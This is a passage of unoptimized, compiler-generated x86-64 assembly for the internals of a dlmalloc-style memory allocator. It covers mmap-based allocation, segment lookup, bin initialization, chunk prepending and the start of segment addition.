.p2align 4, 0x90 ## -- Begin function mmap_alloc
_mmap_alloc: ## @mmap_alloc
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $80, %rsp
movq %rdi, -16(%rbp)
movq %rsi, -24(%rbp)
movq -24(%rbp), %rax
addq $48, %rax
addq $15, %rax
movq _mparams+8(%rip), %rcx
subq $1, %rcx
addq %rcx, %rax
movq _mparams+8(%rip), %rcx
subq $1, %rcx
xorq $-1, %rcx
andq %rcx, %rax
movq %rax, -32(%rbp)
movq -16(%rbp), %rax
cmpq $0, 872(%rax)
je LBB34_5
## %bb.1:
movq -16(%rbp), %rax
movq 856(%rax), %rax
addq -32(%rbp), %rax
movq %rax, -40(%rbp)
movq -40(%rbp), %rax
movq -16(%rbp), %rcx
cmpq 856(%rcx), %rax
jbe LBB34_3
## %bb.2:
movq -40(%rbp), %rax
movq -16(%rbp), %rcx
cmpq 872(%rcx), %rax
jbe LBB34_4
LBB34_3:
movq $0, -8(%rbp)
jmp LBB34_18
LBB34_4:
jmp LBB34_5
LBB34_5:
movq -32(%rbp), %rax
cmpq -24(%rbp), %rax
jbe LBB34_17
## %bb.6:
movq -32(%rbp), %rsi
xorl %eax, %eax
movl %eax, %r9d
movl $3, %edx
movl $4098, %ecx ## imm = 0x1002
movl $4294967295, %r8d ## imm = 0xFFFFFFFF
movq %r9, %rdi
callq _mmap
movq %rax, -48(%rbp)
movq $-1, %rax
cmpq %rax, -48(%rbp)
je LBB34_16
## %bb.7:
movq -48(%rbp), %rax
addq $16, %rax
andq $15, %rax
cmpq $0, %rax
jne LBB34_9
## %bb.8:
xorl %eax, %eax
## kill: def $rax killed $eax
movq %rax, -80(%rbp) ## 8-byte Spill
jmp LBB34_10
LBB34_9:
movq -48(%rbp), %rcx
addq $16, %rcx
andq $15, %rcx
movl $16, %eax
subq %rcx, %rax
andq $15, %rax
movq %rax, -80(%rbp) ## 8-byte Spill
LBB34_10:
movq -80(%rbp), %rax ## 8-byte Reload
movq %rax, -56(%rbp)
movq -32(%rbp), %rax
subq -56(%rbp), %rax
subq $32, %rax
movq %rax, -64(%rbp)
movq -48(%rbp), %rax
addq -56(%rbp), %rax
movq %rax, -72(%rbp)
movq -56(%rbp), %rcx
movq -72(%rbp), %rax
movq %rcx, (%rax)
movq -64(%rbp), %rcx
movq -72(%rbp), %rax
movq %rcx, 8(%rax)
movq -72(%rbp), %rax
movq -64(%rbp), %rcx
movq $11, 8(%rax,%rcx)
movq -72(%rbp), %rax
movq -64(%rbp), %rcx
movq $0, 16(%rax,%rcx)
movq -16(%rbp), %rax
cmpq $0, 24(%rax)
je LBB34_12
## %bb.11:
movq -48(%rbp), %rax
movq -16(%rbp), %rcx
cmpq 24(%rcx), %rax
jae LBB34_13
LBB34_12:
movq -48(%rbp), %rcx
movq -16(%rbp), %rax
movq %rcx, 24(%rax)
LBB34_13:
movq -32(%rbp), %rax
movq -16(%rbp), %rcx
addq 856(%rcx), %rax
movq %rax, 856(%rcx)
movq -16(%rbp), %rcx
cmpq 864(%rcx), %rax
jbe LBB34_15
## %bb.14:
movq -16(%rbp), %rax
movq 856(%rax), %rcx
movq -16(%rbp), %rax
movq %rcx, 864(%rax)
LBB34_15:
movq -72(%rbp), %rax
addq $16, %rax
movq %rax, -8(%rbp)
jmp LBB34_18
LBB34_16:
jmp LBB34_17
LBB34_17:
movq $0, -8(%rbp)
LBB34_18:
movq -8(%rbp), %rax
addq $80, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function segment_holding
_segment_holding: ## @segment_holding
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -16(%rbp)
movq %rsi, -24(%rbp)
movq -16(%rbp), %rax
addq $888, %rax ## imm = 0x378
movq %rax, -32(%rbp)
LBB35_1: ## =>This Inner Loop Header: Depth=1
movq -24(%rbp), %rax
movq -32(%rbp), %rcx
cmpq (%rcx), %rax
jb LBB35_4
## %bb.2: ## in Loop: Header=BB35_1 Depth=1
movq -24(%rbp), %rax
movq -32(%rbp), %rcx
movq (%rcx), %rcx
movq -32(%rbp), %rdx
addq 8(%rdx), %rcx
cmpq %rcx, %rax
jae LBB35_4
## %bb.3:
movq -32(%rbp), %rax
movq %rax, -8(%rbp)
jmp LBB35_7
LBB35_4: ## in Loop: Header=BB35_1 Depth=1
movq -32(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -32(%rbp)
cmpq $0, %rax
jne LBB35_6
## %bb.5:
movq $0, -8(%rbp)
jmp LBB35_7
LBB35_6: ## in Loop: Header=BB35_1 Depth=1
jmp LBB35_1
LBB35_7:
movq -8(%rbp), %rax
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function init_bins
_init_bins: ## @init_bins
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movl $0, -12(%rbp)
LBB36_1: ## =>This Inner Loop Header: Depth=1
cmpl $32, -12(%rbp)
jae LBB36_4
## %bb.2: ## in Loop: Header=BB36_1 Depth=1
movq -8(%rbp), %rax
addq $72, %rax
movl -12(%rbp), %ecx
shll $1, %ecx
movl %ecx, %ecx
## kill: def $rcx killed $ecx
shlq $3, %rcx
addq %rcx, %rax
movq %rax, -24(%rbp)
movq -24(%rbp), %rcx
movq -24(%rbp), %rax
movq %rcx, 24(%rax)
movq -24(%rbp), %rax
movq %rcx, 16(%rax)
## %bb.3: ## in Loop: Header=BB36_1 Depth=1
movl -12(%rbp), %eax
addl $1, %eax
movl %eax, -12(%rbp)
jmp LBB36_1
LBB36_4:
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function init_top
_init_top: ## @init_top
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq %rdx, -24(%rbp)
movq -16(%rbp), %rax
addq $16, %rax
andq $15, %rax
cmpq $0, %rax
jne LBB37_2
## %bb.1:
xorl %eax, %eax
## kill: def $rax killed $eax
movq %rax, -40(%rbp) ## 8-byte Spill
jmp LBB37_3
LBB37_2:
movq -16(%rbp), %rcx
addq $16, %rcx
andq $15, %rcx
movl $16, %eax
subq %rcx, %rax
andq $15, %rax
movq %rax, -40(%rbp) ## 8-byte Spill
LBB37_3:
movq -40(%rbp), %rax ## 8-byte Reload
movq %rax, -32(%rbp)
movq -16(%rbp), %rax
addq -32(%rbp), %rax
movq %rax, -16(%rbp)
movq -32(%rbp), %rcx
movq -24(%rbp), %rax
subq %rcx, %rax
movq %rax, -24(%rbp)
movq -16(%rbp), %rcx
movq -8(%rbp), %rax
movq %rcx, 40(%rax)
movq -24(%rbp), %rcx
movq -8(%rbp), %rax
movq %rcx, 16(%rax)
movq -24(%rbp), %rcx
orq $1, %rcx
movq -16(%rbp), %rax
movq %rcx, 8(%rax)
movq -16(%rbp), %rax
movq -24(%rbp), %rcx
movq $80, 8(%rax,%rcx)
movq _mparams+32(%rip), %rcx
movq -8(%rbp), %rax
movq %rcx, 48(%rax)
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function prepend_alloc
_prepend_alloc: ## @prepend_alloc
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $352, %rsp ## imm = 0x160
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq %rdx, -24(%rbp)
movq %rcx, -32(%rbp)
movq -16(%rbp), %rax
movq %rax, -288(%rbp) ## 8-byte Spill
movq -16(%rbp), %rax
addq $16, %rax
andq $15, %rax
cmpq $0, %rax
jne LBB38_2
## %bb.1:
xorl %eax, %eax
## kill: def $rax killed $eax
movq %rax, -296(%rbp) ## 8-byte Spill
jmp LBB38_3
LBB38_2:
movq -16(%rbp), %rcx
addq $16, %rcx
andq $15, %rcx
movl $16, %eax
subq %rcx, %rax
andq $15, %rax
movq %rax, -296(%rbp) ## 8-byte Spill
LBB38_3:
movq -288(%rbp), %rax ## 8-byte Reload
movq -296(%rbp), %rcx ## 8-byte Reload
addq %rcx, %rax
movq %rax, -40(%rbp)
movq -24(%rbp), %rax
movq %rax, -304(%rbp) ## 8-byte Spill
movq -24(%rbp), %rax
addq $16, %rax
andq $15, %rax
cmpq $0, %rax
jne LBB38_5
## %bb.4:
xorl %eax, %eax
## kill: def $rax killed $eax
movq %rax, -312(%rbp) ## 8-byte Spill
jmp LBB38_6
LBB38_5:
movq -24(%rbp), %rcx
addq $16, %rcx
andq $15, %rcx
movl $16, %eax
subq %rcx, %rax
andq $15, %rax
movq %rax, -312(%rbp) ## 8-byte Spill
LBB38_6:
movq -304(%rbp), %rax ## 8-byte Reload
movq -312(%rbp), %rcx ## 8-byte Reload
addq %rcx, %rax
movq %rax, -48(%rbp)
movq -48(%rbp), %rax
movq -40(%rbp), %rcx
subq %rcx, %rax
movq %rax, -56(%rbp)
movq -40(%rbp), %rax
addq -32(%rbp), %rax
movq %rax, -64(%rbp)
movq -56(%rbp), %rax
subq -32(%rbp), %rax
movq %rax, -72(%rbp)
movq -32(%rbp), %rcx
orq $1, %rcx
orq $2, %rcx
movq -40(%rbp), %rax
movq %rcx, 8(%rax)
movq -48(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 40(%rcx), %rax
jne LBB38_8
## %bb.7:
movq -72(%rbp), %rax
movq -8(%rbp), %rcx
addq 16(%rcx), %rax
movq %rax, 16(%rcx)
movq %rax, -80(%rbp)
movq -64(%rbp), %rcx
movq -8(%rbp), %rax
movq %rcx, 40(%rax)
movq -80(%rbp), %rcx
orq $1, %rcx
movq -64(%rbp), %rax
movq %rcx, 8(%rax)
jmp LBB38_117
LBB38_8:
movq -48(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 32(%rcx), %rax
jne LBB38_10
## %bb.9:
movq -72(%rbp), %rax
movq -8(%rbp), %rcx
addq 8(%rcx), %rax
movq %rax, 8(%rcx)
movq %rax, -88(%rbp)
movq -64(%rbp), %rcx
movq -8(%rbp), %rax
movq %rcx, 32(%rax)
movq -88(%rbp), %rcx
orq $1, %rcx
movq -64(%rbp), %rax
movq %rcx, 8(%rax)
movq -88(%rbp), %rdx
movq -64(%rbp), %rax
movq -88(%rbp), %rcx
movq %rdx, (%rax,%rcx)
jmp LBB38_116
LBB38_10:
movq -48(%rbp), %rax
movq 8(%rax), %rax
andq $3, %rax
cmpq $1, %rax
jne LBB38_80
## %bb.11:
movq -48(%rbp), %rax
movq 8(%rax), %rax
andq $-8, %rax
movq %rax, -96(%rbp)
movq -96(%rbp), %rax
shrq $3, %rax
cmpq $32, %rax
jae LBB38_30
## %bb.12:
movq -48(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -104(%rbp)
movq -48(%rbp), %rax
movq 24(%rax), %rax
movq %rax, -112(%rbp)
movq -96(%rbp), %rax
shrq $3, %rax
## kill: def $eax killed $eax killed $rax
movl %eax, -116(%rbp)
movq -104(%rbp), %rcx
movq -8(%rbp), %rdx
addq $72, %rdx
movl -116(%rbp), %eax
shll $1, %eax
movl %eax, %eax
## kill: def $rax killed $eax
shlq $3, %rax
addq %rax, %rdx
movb $1, %al
cmpq %rdx, %rcx
movb %al, -313(%rbp) ## 1-byte Spill
je LBB38_16
## %bb.13:
movq -104(%rbp), %rcx
movq -8(%rbp), %rdx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq 24(%rdx), %rcx
movb %al, -314(%rbp) ## 1-byte Spill
jb LBB38_15
## %bb.14:
movq -104(%rbp), %rax
movq 24(%rax), %rax
cmpq -48(%rbp), %rax
sete %al
movb %al, -314(%rbp) ## 1-byte Spill
LBB38_15:
movb -314(%rbp), %al ## 1-byte Reload
movb %al, -313(%rbp) ## 1-byte Spill
LBB38_16:
movb -313(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB38_28
## %bb.17:
movq -112(%rbp), %rax
cmpq -104(%rbp), %rax
jne LBB38_19
## %bb.18:
movl -116(%rbp), %ecx
movl $1, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
movl %eax, %ecx
xorl $-1, %ecx
movq -8(%rbp), %rax
andl (%rax), %ecx
movl %ecx, (%rax)
jmp LBB38_27
LBB38_19:
movq -112(%rbp), %rcx
movq -8(%rbp), %rdx
addq $72, %rdx
movl -116(%rbp), %eax
shll $1, %eax
movl %eax, %eax
## kill: def $rax killed $eax
shlq $3, %rax
addq %rax, %rdx
movb $1, %al
cmpq %rdx, %rcx
movb %al, -315(%rbp) ## 1-byte Spill
je LBB38_23
## %bb.20:
movq -112(%rbp), %rcx
movq -8(%rbp), %rdx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq 24(%rdx), %rcx
movb %al, -316(%rbp) ## 1-byte Spill
jb LBB38_22
## %bb.21:
movq -112(%rbp), %rax
movq 16(%rax), %rax
cmpq -48(%rbp), %rax
sete %al
movb %al, -316(%rbp) ## 1-byte Spill
LBB38_22:
movb -316(%rbp), %al ## 1-byte Reload
movb %al, -315(%rbp) ## 1-byte Spill
LBB38_23:
movb -315(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB38_25
## %bb.24:
movq -112(%rbp), %rcx
movq -104(%rbp), %rax
movq %rcx, 24(%rax)
movq -104(%rbp), %rcx
movq -112(%rbp), %rax
movq %rcx, 16(%rax)
jmp LBB38_26
LBB38_25:
callq _abort
LBB38_26:
jmp LBB38_27
LBB38_27:
jmp LBB38_29
LBB38_28:
callq _abort
LBB38_29:
jmp LBB38_79
LBB38_30:
movq -48(%rbp), %rax
movq %rax, -128(%rbp)
movq -128(%rbp), %rax
movq 48(%rax), %rax
movq %rax, -136(%rbp)
movq -128(%rbp), %rax
movq 24(%rax), %rax
cmpq -128(%rbp), %rax
je LBB38_38
## %bb.31:
movq -128(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -152(%rbp)
movq -128(%rbp), %rax
movq 24(%rax), %rax
movq %rax, -144(%rbp)
movq -152(%rbp), %rcx
movq -8(%rbp), %rdx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq 24(%rdx), %rcx
movb %al, -317(%rbp) ## 1-byte Spill
jb LBB38_34
## %bb.32:
movq -152(%rbp), %rax
movq 24(%rax), %rcx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq -128(%rbp), %rcx
movb %al, -317(%rbp) ## 1-byte Spill
jne LBB38_34
## %bb.33:
movq -144(%rbp), %rax
movq 16(%rax), %rax
cmpq -128(%rbp), %rax
sete %al
movb %al, -317(%rbp) ## 1-byte Spill
LBB38_34:
movb -317(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB38_36
## %bb.35:
movq -144(%rbp), %rcx
movq -152(%rbp), %rax
movq %rcx, 24(%rax)
movq -152(%rbp), %rcx
movq -144(%rbp), %rax
movq %rcx, 16(%rax)
jmp LBB38_37
LBB38_36:
callq _abort
LBB38_37:
jmp LBB38_50
LBB38_38:
movq -128(%rbp), %rax
movq %rax, %rcx
addq $32, %rcx
addq $8, %rcx
movq %rcx, -160(%rbp)
movq 40(%rax), %rax
movq %rax, -144(%rbp)
cmpq $0, %rax
jne LBB38_40
## %bb.39:
movq -128(%rbp), %rax
movq %rax, %rcx
addq $32, %rcx
movq %rcx, -160(%rbp)
movq 32(%rax), %rax
movq %rax, -144(%rbp)
cmpq $0, %rax
je LBB38_49
LBB38_40:
jmp LBB38_41
LBB38_41: ## =>This Inner Loop Header: Depth=1
movq -144(%rbp), %rcx
movq %rcx, %rax
addq $32, %rax
addq $8, %rax
movq %rax, -168(%rbp)
movb $1, %al
cmpq $0, 40(%rcx)
movb %al, -318(%rbp) ## 1-byte Spill
jne LBB38_43
## %bb.42: ## in Loop: Header=BB38_41 Depth=1
movq -144(%rbp), %rax
movq %rax, %rcx
addq $32, %rcx
movq %rcx, -168(%rbp)
cmpq $0, 32(%rax)
setne %al
movb %al, -318(%rbp) ## 1-byte Spill
LBB38_43: ## in Loop: Header=BB38_41 Depth=1
movb -318(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB38_44
jmp LBB38_45
LBB38_44: ## in Loop: Header=BB38_41 Depth=1
movq -168(%rbp), %rax
movq %rax, -160(%rbp)
movq (%rax), %rax
movq %rax, -144(%rbp)
jmp LBB38_41
LBB38_45:
movq -160(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB38_47
## %bb.46:
movq -160(%rbp), %rax
movq $0, (%rax)
jmp LBB38_48
LBB38_47:
callq _abort
LBB38_48:
jmp LBB38_49
LBB38_49:
jmp LBB38_50
LBB38_50:
cmpq $0, -136(%rbp)
je LBB38_78
## %bb.51:
movq -8(%rbp), %rax
addq $600, %rax ## imm = 0x258
movq -128(%rbp), %rcx
movl 56(%rcx), %ecx
## kill: def $rcx killed $ecx
shlq $3, %rcx
addq %rcx, %rax
movq %rax, -176(%rbp)
movq -128(%rbp), %rax
movq -176(%rbp), %rcx
cmpq (%rcx), %rax
jne LBB38_55
## %bb.52:
movq -144(%rbp), %rax
movq -176(%rbp), %rcx
movq %rax, (%rcx)
cmpq $0, %rax
jne LBB38_54
## %bb.53:
movq -128(%rbp), %rax
movl 56(%rax), %ecx
movl $1, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
movl %eax, %ecx
xorl $-1, %ecx
movq -8(%rbp), %rax
andl 4(%rax), %ecx
movl %ecx, 4(%rax)
LBB38_54:
jmp LBB38_62
LBB38_55:
movq -136(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB38_60
## %bb.56:
movq -136(%rbp), %rax
movq 32(%rax), %rax
cmpq -128(%rbp), %rax
jne LBB38_58
## %bb.57:
movq -144(%rbp), %rcx
movq -136(%rbp), %rax
movq %rcx, 32(%rax)
jmp LBB38_59
LBB38_58:
movq -144(%rbp), %rcx
movq -136(%rbp), %rax
movq %rcx, 40(%rax)
LBB38_59:
jmp LBB38_61
LBB38_60:
callq _abort
LBB38_61:
jmp LBB38_62
LBB38_62:
cmpq $0, -144(%rbp)
je LBB38_77
## %bb.63:
movq -144(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB38_75
## %bb.64:
movq -136(%rbp), %rcx
movq -144(%rbp), %rax
movq %rcx, 48(%rax)
movq -128(%rbp), %rax
movq 32(%rax), %rax
movq %rax, -184(%rbp)
cmpq $0, %rax
je LBB38_69
## %bb.65:
movq -184(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB38_67
## %bb.66:
movq -184(%rbp), %rcx
movq -144(%rbp), %rax
movq %rcx, 32(%rax)
movq -144(%rbp), %rcx
movq -184(%rbp), %rax
movq %rcx, 48(%rax)
jmp LBB38_68
LBB38_67:
callq _abort
LBB38_68:
jmp LBB38_69
LBB38_69:
movq -128(%rbp), %rax
movq 40(%rax), %rax
movq %rax, -192(%rbp)
cmpq $0, %rax
je LBB38_74
## %bb.70:
movq -192(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB38_72
## %bb.71:
movq -192(%rbp), %rcx
movq -144(%rbp), %rax
movq %rcx, 40(%rax)
movq -144(%rbp), %rcx
movq -192(%rbp), %rax
movq %rcx, 48(%rax)
jmp LBB38_73
LBB38_72:
callq _abort
LBB38_73:
jmp LBB38_74
LBB38_74:
jmp LBB38_76
LBB38_75:
callq _abort
LBB38_76:
jmp LBB38_77
LBB38_77:
jmp LBB38_78
LBB38_78:
jmp LBB38_79
LBB38_79:
movq -48(%rbp), %rax
addq -96(%rbp), %rax
movq %rax, -48(%rbp)
movq -96(%rbp), %rax
addq -72(%rbp), %rax
movq %rax, -72(%rbp)
LBB38_80:
movq -48(%rbp), %rax
movq 8(%rax), %rcx
andq $-2, %rcx
movq %rcx, 8(%rax)
movq -72(%rbp), %rcx
orq $1, %rcx
movq -64(%rbp), %rax
movq %rcx, 8(%rax)
movq -72(%rbp), %rdx
movq -64(%rbp), %rax
movq -72(%rbp), %rcx
movq %rdx, (%rax,%rcx)
movq -72(%rbp), %rax
shrq $3, %rax
cmpq $32, %rax
jae LBB38_88
## %bb.81:
movq -72(%rbp), %rax
shrq $3, %rax
## kill: def $eax killed $eax killed $rax
movl %eax, -196(%rbp)
movq -8(%rbp), %rax
addq $72, %rax
movl -196(%rbp), %ecx
shll $1, %ecx
movl %ecx, %ecx
## kill: def $rcx killed $ecx
shlq $3, %rcx
addq %rcx, %rax
movq %rax, -208(%rbp)
movq -208(%rbp), %rax
movq %rax, -216(%rbp)
movq -8(%rbp), %rax
movl (%rax), %eax
movl -196(%rbp), %ecx
movl $1, %edx
## kill: def $cl killed $ecx
shll %cl, %edx
movl %edx, %ecx
andl %ecx, %eax
cmpl $0, %eax
jne LBB38_83
## %bb.82:
movl -196(%rbp), %ecx
movl $1, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
movl %eax, %ecx
movq -8(%rbp), %rax
orl (%rax), %ecx
movl %ecx, (%rax)
jmp LBB38_87
LBB38_83:
movq -208(%rbp), %rax
movq 16(%rax), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB38_85
## %bb.84:
movq -208(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -216(%rbp)
jmp LBB38_86
LBB38_85:
callq _abort
LBB38_86:
jmp LBB38_87
LBB38_87:
movq -64(%rbp), %rcx
movq -208(%rbp), %rax
movq %rcx, 16(%rax)
movq -64(%rbp), %rcx
movq -216(%rbp), %rax
movq %rcx, 24(%rax)
movq -216(%rbp), %rcx
movq -64(%rbp), %rax
movq %rcx, 16(%rax)
movq -208(%rbp), %rcx
movq -64(%rbp), %rax
movq %rcx, 24(%rax)
jmp LBB38_115
LBB38_88:
movq -64(%rbp), %rax
movq %rax, -224(%rbp)
movq -72(%rbp), %rax
shrq $8, %rax
## kill: def $eax killed $eax killed $rax
movl %eax, -240(%rbp)
cmpl $0, -240(%rbp)
jne LBB38_90
## %bb.89:
movl $0, -236(%rbp)
jmp LBB38_94
LBB38_90:
cmpl $65535, -240(%rbp) ## imm = 0xFFFF
jbe LBB38_92
## %bb.91:
movl $31, -236(%rbp)
jmp LBB38_93
LBB38_92:
movl -240(%rbp), %eax
bsrl %eax, %ecx
xorl $31, %ecx
movl $31, %eax
subl %ecx, %eax
movl %eax, -244(%rbp)
movl -244(%rbp), %eax
shll $1, %eax
movl %eax, %eax
## kill: def $rax killed $eax
movq -72(%rbp), %rdx
movl -244(%rbp), %ecx
addl $7, %ecx
movl %ecx, %ecx
## kill: def $rcx killed $ecx
## kill: def $cl killed $rcx
shrq %cl, %rdx
movq %rdx, %rcx
andq $1, %rcx
addq %rcx, %rax
## kill: def $eax killed $eax killed $rax
movl %eax, -236(%rbp)
LBB38_93:
jmp LBB38_94
LBB38_94:
movq -8(%rbp), %rax
addq $600, %rax ## imm = 0x258
movl -236(%rbp), %ecx
## kill: def $rcx killed $ecx
shlq $3, %rcx
addq %rcx, %rax
movq %rax, -232(%rbp)
movl -236(%rbp), %ecx
movq -224(%rbp), %rax
movl %ecx, 56(%rax)
movq -224(%rbp), %rax
movq $0, 40(%rax)
movq -224(%rbp), %rax
movq $0, 32(%rax)
movq -8(%rbp), %rax
movl 4(%rax), %eax
movl -236(%rbp), %ecx
movl $1, %edx
## kill: def $cl killed $ecx
shll %cl, %edx
movl %edx, %ecx
andl %ecx, %eax
cmpl $0, %eax
jne LBB38_96
## %bb.95:
movl -236(%rbp), %ecx
movl $1, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
movl %eax, %ecx
movq -8(%rbp), %rax
orl 4(%rax), %ecx
movl %ecx, 4(%rax)
movq -224(%rbp), %rcx
movq -232(%rbp), %rax
movq %rcx, (%rax)
movq -232(%rbp), %rcx
movq -224(%rbp), %rax
movq %rcx, 48(%rax)
movq -224(%rbp), %rcx
movq -224(%rbp), %rax
movq %rcx, 24(%rax)
movq -224(%rbp), %rax
movq %rcx, 16(%rax)
jmp LBB38_114
LBB38_96:
movq -232(%rbp), %rax
movq (%rax), %rax
movq %rax, -256(%rbp)
movq -72(%rbp), %rax
movq %rax, -328(%rbp) ## 8-byte Spill
cmpl $31, -236(%rbp)
jne LBB38_98
## %bb.97:
xorl %eax, %eax
## kill: def $rax killed $eax
movq %rax, -336(%rbp) ## 8-byte Spill
jmp LBB38_99
LBB38_98:
movl -236(%rbp), %eax
shrl $1, %eax
addl $8, %eax
subl $2, %eax
movl %eax, %eax
movl %eax, %ecx
movl $63, %eax
subq %rcx, %rax
movq %rax, -336(%rbp) ## 8-byte Spill
LBB38_99:
movq -328(%rbp), %rax ## 8-byte Reload
movq -336(%rbp), %rcx ## 8-byte Reload
## kill: def $cl killed $rcx
shlq %cl, %rax
movq %rax, -264(%rbp)
LBB38_100: ## =>This Inner Loop Header: Depth=1
movq -256(%rbp), %rax
movq 8(%rax), %rax
andq $-8, %rax
cmpq -72(%rbp), %rax
je LBB38_107
## %bb.101: ## in Loop: Header=BB38_100 Depth=1
movq -256(%rbp), %rax
addq $32, %rax
movq -264(%rbp), %rcx
shrq $63, %rcx
andq $1, %rcx
shlq $3, %rcx
addq %rcx, %rax
movq %rax, -272(%rbp)
movq -264(%rbp), %rax
shlq $1, %rax
movq %rax, -264(%rbp)
movq -272(%rbp), %rax
cmpq $0, (%rax)
je LBB38_103
## %bb.102: ## in Loop: Header=BB38_100 Depth=1
movq -272(%rbp), %rax
movq (%rax), %rax
movq %rax, -256(%rbp)
jmp LBB38_106
LBB38_103:
movq -272(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB38_105
## %bb.104:
movq -224(%rbp), %rcx
movq -272(%rbp), %rax
movq %rcx, (%rax)
movq -256(%rbp), %rcx
movq -224(%rbp), %rax
movq %rcx, 48(%rax)
movq -224(%rbp), %rcx
movq -224(%rbp), %rax
movq %rcx, 24(%rax)
movq -224(%rbp), %rax
movq %rcx, 16(%rax)
jmp LBB38_113
LBB38_105:
callq _abort
LBB38_106: ## in Loop: Header=BB38_100 Depth=1
jmp LBB38_112
LBB38_107:
movq -256(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -280(%rbp)
movq -256(%rbp), %rcx
movq -8(%rbp), %rdx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq 24(%rdx), %rcx
movb %al, -337(%rbp) ## 1-byte Spill
jb LBB38_109
## %bb.108:
movq -280(%rbp), %rax
movq -8(%rbp), %rcx
cmpq 24(%rcx), %rax
setae %al
movb %al, -337(%rbp) ## 1-byte Spill
LBB38_109:
movb -337(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB38_111
## %bb.110:
movq -224(%rbp), %rcx
movq -280(%rbp), %rax
movq %rcx, 24(%rax)
movq -256(%rbp), %rax
movq %rcx, 16(%rax)
movq -280(%rbp), %rcx
movq -224(%rbp), %rax
movq %rcx, 16(%rax)
movq -256(%rbp), %rcx
movq -224(%rbp), %rax
movq %rcx, 24(%rax)
movq -224(%rbp), %rax
movq $0, 48(%rax)
jmp LBB38_113
LBB38_111:
callq _abort
LBB38_112: ## in Loop: Header=BB38_100 Depth=1
jmp LBB38_100
LBB38_113:
jmp LBB38_114
LBB38_114:
jmp LBB38_115
LBB38_115:
jmp LBB38_116
LBB38_116:
jmp LBB38_117
LBB38_117:
movq -40(%rbp), %rax
addq $16, %rax
addq $352, %rsp ## imm = 0x160
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function add_segment
_add_segment: ## @add_segment
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $304, %rsp ## imm = 0x130
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq %rdx, -24(%rbp)
movl %ecx, -28(%rbp)
movq -8(%rbp), %rax
movq 40(%rax), %rax
movq %rax, -40(%rbp)
movq -8(%rbp), %rdi
movq -40(%rbp), %rsi
callq _segment_holding
movq %rax, -48(%rbp)
movq -48(%rbp), %rax
movq (%rax), %rax
movq -48(%rbp), %rcx
addq 8(%rcx), %rax
movq %rax, -56(%rbp)
movq $48, -64(%rbp)
movq -56(%rbp), %rax
movq -64(%rbp), %rdx
addq $32, %rdx
addq $15, %rdx
xorl %ecx, %ecx
## kill: def $rcx killed $ecx
subq %rdx, %rcx
addq %rcx, %rax
movq %rax, -72(%rbp)
movq -72(%rbp), %rax
